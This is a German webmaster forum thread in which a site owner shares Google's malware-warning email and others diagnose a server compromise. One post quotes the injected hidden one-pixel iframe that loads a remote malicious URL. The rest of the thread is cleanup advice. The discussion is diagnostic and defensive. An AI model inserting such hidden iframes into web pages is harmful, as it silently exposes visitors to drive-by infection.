Mail von Google - Malware - hä??

Beitrag von fo » 30.04.2007, 10:37

Das hat google uns heute angetan (Platz 6)
https://www.google.de/search?hl=de&q=bo ... uche&meta=

Was soll denn das?? Hier die Mail von Google, ich verstehe nicht, was die da von uns wollen:

Dear site owner or webmaster of pro-colors.de,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

https://www.pro-colors .de/
https://www.pro-colors .de/agb.html
https://www.pro-colors .de/kurse.html

Here is a link to a sample warning page:
https://www.google.com/interstitial?url ... colors.de/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
https://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be
removed by visiting https://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.

Sincerely,
Google Search Quality Team

von **Anzeige von ABAKUS** »

Hochwertiger Linkaufbau bei ABAKUS:

Google-konformer Linkaufbau
nachhaltiges Ranking
Linkbuilding Angebote zu fairen Preisen
internationale Backlinks

Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

Beitrag von **Pompom** » 30.04.2007, 10:44

Du hast den Expoit HTML.IframeBof auf der Seite.

Beitrag von fo » 30.04.2007, 10:45

Was ist denn das?? Wie krieg ich den wieder runter??

von **Anzeige von ABAKUS** »

Content Erstellung von ABAKUS Internet Marketing
Ihre Vorteile:

einzigartige Texte
suchmaschinenoptimierte Inhalte
eine sinnvolle Content-Strategie
Beratung und Umsetzung

Jetzt anfragen: 0511 / 300325-0

Beitrag von **Pompom** » 30.04.2007, 10:52

Kennst du das da aus deinem Quellcode, und was ist das ?

<iframe src='https://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'>

Beitrag von fo » 30.04.2007, 11:01

ne! habs eben auch ausm quelltext entfernt. aber is nu wieder drin verstehe das net!!

Beitrag von fo » 30.04.2007, 11:03

habs gefunden stand in zwei dateien drin. hat sich da jemand eingehakt???

Beitrag von **Pompom** » 30.04.2007, 11:05

Dein Server wird wohl kompromittiert sein.
Solltest mal sehen, dass du das Betriebssystem neu aufspielst, das wäre die sicherste Version.
Andere Möglichkeit wäre, dass du unserichere Scripts installiert hast, die es erlauben, externen Code auszuführen.

Vielleicht hilft ein Logcheck weiter.

Beitrag von **ole1210** » 30.04.2007, 11:09

Da vermute ich mal, das irgendwas bei dir nicht sicher ist.

Falsche Rechte gesetzt, oder irgendwer anders der bei dir mit aufms Server liegt hat unsicher Scripte, oder der ganze Server ist komisch programmiert, oder du hast unsichere Scripte im Einsatz etc.

Gibbet viele Möglichkeiten. Solltest du aber auf jeden fall mal wen ranlassen, der davon Ahnung hat.

An welche Adresse wurde die eMail gesendet? info@, webmaster@ ??

Beitrag von ts » 30.04.2007, 11:14

Alle Passwörter ändern

Beitrag von fo » 30.04.2007, 11:17

also das war auf zwei seiten von vielen, die wir auf dem server laufen haben, jedoch unterscheiden die sich vom system her grundlegend (eines ist joomla, das andere selbstprogrammiert).

geil, wenn der server kompromittiert ist, darf ich alles neu machen. super, man hat ja sonst nix zu tun.

Beitrag von **lloy** » 30.04.2007, 11:19

Wenns ein eigener Server oder VServer ist, tu der Welt und Dir einen Gefallen und setz ihn komplett neu auf.

Passwörter ändern reicht nicht. Wenn jemand das Teil als Spamschleuder missbraucht kanns richtig teuer werden.

Edit: Joomla ist in letzter Zeit teilweise durch viele Sicherheitslücken aufgefallen.

Beitrag von **Pompom** » 30.04.2007, 11:19

Ich weiss nicht, welche joomla-Version du drauf hast, es gab einige (viele?) die strotzten vor Sicherheitslücken.

Beitrag von **ole1210** » 30.04.2007, 11:25

Einige? Viele? ALLE!!!

Beitrag von **fi-ausbilden** » 30.04.2007, 11:31

... doch lieber TYPO3 machen

...

Beitrag von fo » 30.04.2007, 11:37

ohje minee.. kann aber nicht alle system umstellen. wir haben da einen root server laufen, system neu aufsetzen übersteigt aber unseren kenntnisstand. meint ihr ein managed server würde evtl. helfen?